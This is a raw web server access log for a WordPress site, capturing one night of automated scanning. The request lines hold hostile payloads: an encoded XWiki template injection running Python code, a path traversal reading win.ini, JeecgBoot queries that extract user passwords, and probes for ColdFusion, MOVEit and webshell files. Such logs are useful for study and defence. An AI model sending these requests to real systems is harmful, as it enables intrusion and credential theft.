165.232.54.158 - - [14/Jan/2026:03:27:40 +0800] "GET /bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:27:45 +0800] "GET /asyncrenderer/%7B%7Burl%7D%7D?clientId={{id}}&timeout=500&wiki=xwiki HTTP/1.1" 301 - "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [14/Jan/2026:03:27:49 +0800] "POST /wp-cron.php?doing_wp_cron=1768332469.1459770202636718750000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:03:27:47 +0800] "POST /?wordfence_syncAttackData=1768332467.5753 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:03:29:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768332582.6707749366760253906250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:29:39 +0800] "POST /CFIDE/adminapi/base.cfc?method HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:30:00 +0800] "GET / HTTP/1.1" 200 16720 "-" "python-requests/2.26.0"
165.232.54.158 - - [14/Jan/2026:03:30:05 +0800] "POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
103.4.122.14 - - [14/Jan/2026:03:30:13 +0800] "POST /wp-cron.php?doing_wp_cron=1768332613.6141109466552734375000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:30:10 +0800] "POST /guestaccess.aspx HTTP/1.1" 404 10872 "-" "python-requests/2.26.0"
165.232.54.158 - - [14/Jan/2026:03:30:22 +0800] "POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1" 403 199 "-" "python-requests/2.26.0"
103.4.122.14 - - [14/Jan/2026:03:32:03 +0800] "POST /wp-cron.php?doing_wp_cron=1768332722.9531509876251220703125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:31:58 +0800] "GET /api/server/version HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
103.4.122.14 - - [14/Jan/2026:03:32:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768332731.6370790004730224609375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:32:08 +0800] "POST /api/users HTTP/1.1" 404 10862 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:32:19 +0800] "GET /iclock/file?url=/../../../../../../../../../windows/win.ini HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0"
165.232.54.158 - - [14/Jan/2026:03:32:26 +0800] "GET /b_download/index.html HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:03:32:26 +0800] "GET /b_download/index.html HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/108.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:32:28 +0800] "POST /?wordfence_syncAttackData=1768332748.3908 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:03:32:30 +0800] "POST /wp-cron.php?doing_wp_cron=1768332750.0891280174255371093750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:03:32:28 +0800] "POST /?wordfence_syncAttackData=1768332748.3897 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:34:44 +0800] "GET /sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:34:44 +0800] "GET /sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:34:44 +0800] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:03:34:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768332888.0410349369049072265625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:34:44 +0800] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
103.4.122.14 - - [14/Jan/2026:03:35:30 +0800] "POST /wp-cron.php?doing_wp_cron=1768332930.8260068893432617187500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
82.223.128.142 - - [14/Jan/2026:03:35:25 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0"
165.232.54.158 - - [14/Jan/2026:03:35:44 +0800] "POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
103.4.122.14 - - [14/Jan/2026:03:36:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768332971.5069639682769775390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:03:36:09 +0800] "POST /?wordfence_syncAttackData=1768332969.7114 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:36:07 +0800] "GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:03:37:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768333028.9196610450744628906250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:37:05 +0800] "GET /api/session/properties HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:39:56 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:41:41 +0800] "POST /wp-cron.php?doing_wp_cron=1768333301.9703800678253173828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:41:38 +0800] "GET /222.php HTTP/1.1" 404 52507 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
104.208.97.94 - - [14/Jan/2026:03:41:42 +0800] "GET /bolt.php HTTP/1.1" 404 52508 "https://www.google.de/" "Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:41:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768333307.8697330951690673828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:41:45 +0800] "GET /buy.php HTTP/1.1" 404 52507 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:41:48 +0800] "GET /abcd.php HTTP/1.1" 404 52508 "https://www.google.com/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [14/Jan/2026:03:41:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768333313.4461069107055664062500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:41:50 +0800] "GET /adminfuns.php HTTP/1.1" 404 52513 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:41:53 +0800] "GET /akcc.php HTTP/1.1" 404 52508 "https://www.yahoo.com/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [14/Jan/2026:03:41:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768333318.8970460891723632812500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:41:56 +0800] "GET /bless.php HTTP/1.1" 404 52509 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
104.208.97.94 - - [14/Jan/2026:03:41:59 +0800] "GET /file.php HTTP/1.1" 404 52508 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [14/Jan/2026:03:42:04 +0800] "POST /wp-cron.php?doing_wp_cron=1768333324.7268779277801513671875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:42:01 +0800] "GET /goods.php HTTP/1.1" 404 52509 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:42:04 +0800] "GET /info.php HTTP/1.1" 404 52508 "https://www.google.fr/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [14/Jan/2026:03:42:10 +0800] "POST /wp-cron.php?doing_wp_cron=1768333330.3080248832702636718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:42:07 +0800] "GET /ioxi-o.php HTTP/1.1" 404 52510 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:42:10 +0800] "GET /about.php HTTP/1.1" 404 52509 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [14/Jan/2026:03:42:16 +0800] "POST /wp-cron.php?doing_wp_cron=1768333336.5806879997253417968750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:42:13 +0800] "GET /admin.php HTTP/1.1" 404 52509 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:42:16 +0800] "GET /php.php HTTP/1.1" 404 52507 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [14/Jan/2026:03:42:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768333342.2775928974151611328125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:42:19 +0800] "GET /403.php HTTP/1.1" 404 52507 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:42:22 +0800] "GET /jp.php HTTP/1.1" 404 52506 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:42:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768333347.9418120384216308593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:42:25 +0800] "GET /server.php HTTP/1.1" 404 52510 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:42:28 +0800] "GET /classwithtostring.php HTTP/1.1" 404 52521 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [14/Jan/2026:03:42:33 +0800] "POST /wp-cron.php?doing_wp_cron=1768333353.3429880142211914062500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:42:30 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 52521 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:42:33 +0800] "GET /fonts/index.php HTTP/1.1" 301 - "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:42:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768333358.6281130313873291015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:42:36 +0800] "GET /fonts/ HTTP/1.1" 404 52505 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:42:36 +0800] "GET /file-manager/ HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
104.208.97.94 - - [14/Jan/2026:03:42:38 +0800] "GET /wp.php HTTP/1.1" 404 52506 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:42:44 +0800] "POST /wp-cron.php?doing_wp_cron=1768333364.4456880092620849609375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:42:41 +0800] "GET /wp-good.php HTTP/1.1" 404 52511 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:42:44 +0800] "GET /wp-admin/maint/ HTTP/1.1" 403 199 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:42:43 +0800] "GET /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:42:44 +0800] "POST /file-manager/backend/makefile HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:42:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768333367.9714589118957519531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:42:44 +0800] "GET /wp-admin/images/admin.php HTTP/1.1" 404 52492 "https://www.google.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
104.208.97.94 - - [14/Jan/2026:03:42:48 +0800] "GET /wp-admin/includes/rk2.php HTTP/1.1" 403 199 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [14/Jan/2026:03:42:46 +0800] "GET /wp-login.php HTTP/1.1" 200 3204 "https://nutritaste.com.au/login.php" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:42:48 +0800] "GET /wp-admin/radio.php HTTP/1.1" 404 52507 "https://www.google.com/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [14/Jan/2026:03:42:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768333373.6929650306701660156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:42:51 +0800] "GET /wp-content/ai1wm-backups/about.php HTTP/1.1" 404 52492 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:42:53 +0800] "GET /wp-content/index.php HTTP/1.1" 200 - "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:42:54 +0800] "GET /wp-content/plugins/admin.php HTTP/1.1" 403 199 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:42:52 +0800] "POST /file-manager/backend/text HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [14/Jan/2026:03:42:57 +0800] "POST /wp-cron.php?doing_wp_cron=1768333377.6907169818878173828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:42:55 +0800] "GET /wp-content/plugins/classic-editor/ HTTP/1.1" 404 52492 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:42:57 +0800] "GET /wp-content/plugins/index.php HTTP/1.1" 403 199 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:42:58 +0800] "GET /wp-content/themes/admin.php HTTP/1.1" 403 199 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
104.208.97.94 - - [14/Jan/2026:03:42:58 +0800] "GET /wp-content/themes/twentythirteen/ HTTP/1.1" 404 52492 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:43:01 +0800] "GET /wp-content/themes/twentytwentyfour/index.php HTTP/1.1" 403 199 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:43:03 +0800] "POST /wp-cron.php?doing_wp_cron=1768333383.3248798847198486328125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:43:00 +0800] "POST /file-manager/backend/permissions HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:43:01 +0800] "GET /wp-content/upgrade/index.php HTTP/1.1" 301 - "https://www.google.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
104.208.97.94 - - [14/Jan/2026:03:43:03 +0800] "GET /wp-content/upgrade/ HTTP/1.1" 403 199 "https://www.google.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
104.208.97.94 - - [14/Jan/2026:03:43:03 +0800] "GET /public/fonts/index.php HTTP/1.1" 301 - "https://www.google.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:43:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768333389.1028819084167480468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
104.208.97.94 - - [14/Jan/2026:03:43:06 +0800] "GET /public/fonts/ HTTP/1.1" 404 52499 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:43:09 +0800] "GET /wp-includes/SimplePie/ HTTP/1.1" 403 199 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:43:09 +0800] "GET /wp-includes/assets/ HTTP/1.1" 403 199 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:43:09 +0800] "GET /wp-includes/assets/autoload_classmap.php HTTP/1.1" 403 199 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
104.208.97.94 - - [14/Jan/2026:03:43:09 +0800] "GET /wp-includes/block-bindings/ HTTP/1.1" 403 199 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
104.208.97.94 - - [14/Jan/2026:03:43:09 +0800] "GET /wp-includes/blocks/buttons/index.php HTTP/1.1" 403 199 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:43:08 +0800] "GET /xPYeOWoTf5.php HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/120.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:43:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768333428.3301830291748046875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:43:45 +0800] "GET /login/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Debian; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
103.4.122.14 - - [14/Jan/2026:03:44:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768333440.5825660228729248046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:43:57 +0800] "GET /base/dbbackuplog/table/?page=1&limit=1 HTTP/1.1" 404 10862 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:44:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768333485.5207068920135498046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:44:42 +0800] "GET /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:44:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768333488.6297819614410400390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:44:46 +0800] "GET /wp-login.php HTTP/1.1" 200 3204 "https://nutritaste.com.au/login.php" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:46:12 +0800] "POST /wp-cron.php?doing_wp_cron=1768333572.5257830619812011718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
